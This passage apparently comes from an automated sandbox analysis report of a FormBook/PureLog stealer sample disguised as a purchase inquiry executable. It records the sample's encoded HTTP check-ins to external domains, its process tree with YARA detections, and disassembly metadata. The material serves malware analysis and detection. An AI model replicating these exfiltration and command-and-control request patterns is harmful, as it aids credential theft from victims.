                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.valentinaetommaso.it
                                                                                                                                                                          Origin: http://www.valentinaetommaso.it
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 1252
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.valentinaetommaso.it/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36

                                                                                                                                                                          Timestamp: Apr 26, 2024 07:44:29.441250086 CEST
                                                                                                                                                                          Bytes transferred: 1289
                                                                                                                                                                          Direction: IN
                                                                                                                                                                          Data:
                                                                                                                                                                          HTTP/1.1 404 Not Found
                                                                                                                                                                          Server: openresty
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:44:29 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Set-Cookie: PHPSESSID=hb1459pqtrms7uuji7ounmqv7l; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Content-Encoding: gzip


                                                                                                                                                                          Session ID: 40
                                                                                                                                                                          Source IP: 192.168.2.7
                                                                                                                                                                          Source Port: 49766
                                                                                                                                                                          Destination IP: 3.125.172.46
                                                                                                                                                                          Destination Port: 80
                                                                                                                                                                          PID: 2912
                                                                                                                                                                          Process: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe

                                                                                                                                                                          Timestamp: Apr 26, 2024 07:44:31.943893909 CEST
                                                                                                                                                                          Bytes transferred: 507
                                                                                                                                                                          Direction: OUT
                                                                                                                                                                          Data:
                                                                                                                                                                          GET /aleu/?MzYDklf=qJYbYwaLgLDJAMSHMJQaEOr73chNsD5VMq73qeoAA4dzyQoAh+hTVoh+ah/e183iVnKHGTOXkcX7G8t3YRyjXe/ogXVNID+KtV4n0lPZ2DbPfuvRPmVg0GTYTl/4fOclA5m+2/uM8Ymx&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Host: www.valentinaetommaso.it
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36

                                                                                                                                                                          Timestamp: Apr 26, 2024 07:44:32.237370014 CEST
                                                                                                                                                                          Bytes transferred: 1289
                                                                                                                                                                          Direction: IN
                                                                                                                                                                          Data:
                                                                                                                                                                          HTTP/1.1 404 Not Found
                                                                                                                                                                          Server: openresty
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:44:32 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Set-Cookie: PHPSESSID=40eds17c4uuojiiesh5igmgt9g; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Data Ascii: a138<!DOCTYPE html><html class="no-js" prefix="og: https://ogp.me/ns#" lang="it"><head><link rel="preconnect" href="https://d1di2lzuh97fh2.cloudfront.net" crossorigin><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><meta charset="utf-8"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/2d/2di/2div3h.svg?ph=cb3a78e957" type="image/svg+xml" sizes="any"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/07/07f/07fzq8.svg?ph=cb3a78e957" type="image/svg+xml" sizes="16x16"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957"><link rel="apple-touch-icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>40


                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                          41 | 192.168.2.7 | 49767 | 91.195.240.19 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                          Apr 26, 2024 07:44:47.472965002 CEST | 753 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.solesense.pro
                                                                                                                                                                          Origin: http://www.solesense.pro
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 220
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.solesense.pro/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Ascii: MzYDklf=IuMe+iFtDZEnhM6PiBw6LIqWHnU6pQuahJK3BIFjwwAVrrrRI+kqfnuc6QvQKXNCgTKppiSGuE9Nl6arFUGUSEQRReNOTTcwb97Oxjkwb9zAtXoPqYcfQpygMXb1pwiTWPUWqgFauO3Rxj14jJ8b+298Ta1Y6XudmgJpE83Qhm1Nl/Rt3AcW8rDcRa0lp6Olh1UziZbsmmaRPXc13A==
                                                                                                                                                                          Apr 26, 2024 07:44:47.716365099 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                          content-length: 93
                                                                                                                                                                          cache-control: no-cache
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                          42 | 192.168.2.7 | 49768 | 91.195.240.19 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                          Apr 26, 2024 07:44:50.273463964 CEST | 773 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.solesense.pro
                                                                                                                                                                          Origin: http://www.solesense.pro
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 240
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.solesense.pro/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Ascii: MzYDklf=IuMe+iFtDZEnz8KPhhM6a4qVCnU6wAuehJG3BJBzwDkVqL7RJ6QqKnucywubUnNJgTGbpj+GuHBNl6KrGjqXSUQTa+NMezcwb97OxnIab9bAtG4Po9oYdJyhLXb14AiXWPUkqigPuNPRxmR4t9oUlG96d60X0ET/jCJOEfzVuVp0kJMPtiQ6i67nVYQT+cTQj0Qrv7vN5R/7CF9xhwK2r7SLIJ1f7tIyFwg/0ns=
                                                                                                                                                                          Apr 26, 2024 07:44:50.515738964 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                          content-length: 93
                                                                                                                                                                          cache-control: no-cache
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                          43 | 192.168.2.7 | 49769 | 91.195.240.19 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                          Apr 26, 2024 07:44:53.047148943 CEST | 1786 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.solesense.pro
                                                                                                                                                                          Origin: http://www.solesense.pro
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 1252
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.solesense.pro/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Apr 26, 2024 07:44:53.289206028 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                          content-length: 93
                                                                                                                                                                          cache-control: no-cache
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.7 | 49770 | 91.195.240.19 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 07:44:57.056116104 CEST | 500 | OUT | GET /aleu/?MzYDklf=Fsk+9Ugrf6MFs9mchnETM+3QD2cthhCQsqu2PahB1CBPiKPkA/hmNXSF9ivWSGs/4CiX0i2cy0l6l8SVSxzUF3Q4RMAPDGkyPIDahDw1KMSvyAVfpPYGa57LB1vixmbDZ7oyoAgNkZW7&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Host: www.solesense.pro
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Apr 26, 2024 07:44:57.300765038 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                          content-length: 93
                                                                                                                                                                          cache-control: no-cache
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                                          Target ID:0
                                                                                                                                                                          Start time:07:40:56
                                                                                                                                                                          Start date:26/04/2024
                                                                                                                                                                          Path:C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe"
                                                                                                                                                                          Imagebase:0xe70000
                                                                                                                                                                          File size:761'864 bytes
                                                                                                                                                                          MD5 hash:A20E41F9774504D4BACE9A2A8A7989C6
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1436066446.0000000004219000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1439477334.00000000091B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:3
                                                                                                                                                                          Start time:07:40:57
                                                                                                                                                                          Start date:26/04/2024
                                                                                                                                                                          Path:C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe"
                                                                                                                                                                          Imagebase:0x440000
                                                                                                                                                                          File size:761'864 bytes
                                                                                                                                                                          MD5 hash:A20E41F9774504D4BACE9A2A8A7989C6
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:4
                                                                                                                                                                          Start time:07:40:57
                                                                                                                                                                          Start date:26/04/2024
                                                                                                                                                                          Path:C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe"
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          File size:761'864 bytes
                                                                                                                                                                          MD5 hash:A20E41F9774504D4BACE9A2A8A7989C6
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1483242441.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1483242441.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1485407481.0000000002790000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1485407481.0000000002790000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:7
                                                                                                                                                                          Start time:07:40:57
                                                                                                                                                                          Start date:26/04/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 1380
                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:20
                                                                                                                                                                          Start time:07:41:16
                                                                                                                                                                          Start date:26/04/2024
                                                                                                                                                                          Path:C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe"
                                                                                                                                                                          Imagebase:0x810000
                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.3683910951.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.3683910951.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:21
                                                                                                                                                                          Start time:07:41:18
                                                                                                                                                                          Start date:26/04/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\replace.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\SysWOW64\replace.exe"
                                                                                                                                                                          Imagebase:0x610000
                                                                                                                                                                          File size:18'944 bytes
                                                                                                                                                                          MD5 hash:A7F2E9DD9DE1396B1250F413DA2F6C08
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3676564826.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3676564826.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3683794972.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3683794972.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3683904439.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3683904439.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:22
                                                                                                                                                                          Start time:08:45:09
                                                                                                                                                                          Start date:26/04/2024
                                                                                                                                                                          Path:C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe"
                                                                                                                                                                          Imagebase:0x810000
                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.3686434671.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.3686434671.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:24
                                                                                                                                                                          Start time:08:45:22
                                                                                                                                                                          Start date:26/04/2024
                                                                                                                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                          Imagebase:0x7ff722870000
                                                                                                                                                                          File size:676'768 bytes
                                                                                                                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true


                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:11.1%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                            Signature Coverage:13.3%
                                                                                                                                                                            Total number of Nodes:376
                                                                                                                                                                            Total number of Limit Nodes:15

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437739224.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57c0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $Nq
                                                                                                                                                                            • API String ID: 0-1575210091
                                                                                                                                                                            • Opcode ID: e5b7eaab06e8c0ce0f8a96721812820544d913dcdc9c7000ce11d336609fe558
                                                                                                                                                                            • Instruction ID: 0b31b0be0f36a9dbd389909a52cc50d21fb7b523af0d1f15cbb18b026bb858c9
                                                                                                                                                                            • Opcode Fuzzy Hash: e5b7eaab06e8c0ce0f8a96721812820544d913dcdc9c7000ce11d336609fe558
                                                                                                                                                                            • Instruction Fuzzy Hash: CBB3B634A11219CFCB64DB24C898A99B7B6FF8A315F1141E9D50DAB761DB32AEC1CF40
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
57c952c call 57c95ec call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc 1707->1709 1997 57cd4b9-57cd4d2 1709->1997 1998 57cd3de-57cd3f7 1997->1998 1999 57cd4d8-57cd9a9 call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94dc * 2 call 57c954c call 57c94fc call 57c951c call 57c956c call 57c957c call 57c94dc * 6 call 57c94ec call 57c94fc call 57c951c 1997->1999 2000 57cd3fe-57cd40c 1998->2000 2001 57cd3f9 1998->2001 2071 57cd9b0-57cd9ce 1999->2071 2003 57cd415-57cd435 2000->2003 2001->2000 2005 57cd43c-57cd454 2003->2005 2006 57cd437 2003->2006 2008 57cd45b-57cd4a4 2005->2008 2009 57cd456 2005->2009 2006->2005 2014 57cd4ab-57cd4b8 2008->2014 2015 57cd4a6 2008->2015 2009->2008 2014->1997 2015->2014 2072 57cd9d9-57cd9e5 2071->2072 2073 57cd9ef-57cd9f7 2072->2073 2074 57cd9fd-57cda0d 2073->2074 2075 57cda0f 2074->2075 2076 57cda14-57cda34 2074->2076 2075->2076 2078 57cda3b-57cda8f 2076->2078 2079 57cda36 2076->2079 2082 57cda96-57cdaaf 2078->2082 2083 57cda91 2078->2083 2079->2078 2085 57cdab6-57cdad5 2082->2085 2086 57cdab1 2082->2086 2083->2082 2088 57cdadf-57cdaf7 2085->2088 2086->2085 2089 57cdafe-57cec79 call 57c952c call 57c95bc call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94dc * 6 call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c95bc call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 
57c94ec call 57c94fc call 57c951c call 57c952c call 57c959c call 57c95ac call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c94ec call 57c94fc call 57c951c call 57c952c call 57c95fc call 57c960c call 57c94dc call 57c961c call 57c962c call 57c94fc call 57c963c call 57c964c call 57c965c * 4 2088->2089 2319->1639 2320->1639 2321->1230 2322->1230
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437739224.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57c0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $Nq
                                                                                                                                                                            • API String ID: 0-1575210091
                                                                                                                                                                            • Opcode ID: e12fc0d4d0e57bfda4305b5a9175962b5b701cd271337bfd140eac52210e944a
                                                                                                                                                                            • Instruction ID: 483ef643cc49445f0ee4ebbfea87bebc779778d780452a91711c9ebdbf4920a2
                                                                                                                                                                            • Opcode Fuzzy Hash: e12fc0d4d0e57bfda4305b5a9175962b5b701cd271337bfd140eac52210e944a
                                                                                                                                                                            • Instruction Fuzzy Hash: 3AB3B534A11219CFCB64DB24C898A99B7B6FF8A305F1151E9D50DAB761DB32AEC1CF40
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 0786A1EF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 6842923-0
                                                                                                                                                                            • Opcode ID: 69e4d12ce26161cd88f6b69f8a5b516a01ec3986000c8ab008e828b41e5cd483
                                                                                                                                                                            • Instruction ID: d769a0527161f20a554a3ff58457e30b03fd21e383afc68169744ff8244252ae
                                                                                                                                                                            • Opcode Fuzzy Hash: 69e4d12ce26161cd88f6b69f8a5b516a01ec3986000c8ab008e828b41e5cd483
                                                                                                                                                                            • Instruction Fuzzy Hash: 86D189B0700206AFDB29EB79C454BAEB7E6AF99700F14846DD106DB3D0DB35E905CB92
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • NtUnmapViewOfSection.NTDLL(?,?), ref: 07865E85
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: SectionUnmapView
                                                                                                                                                                            • String ID:
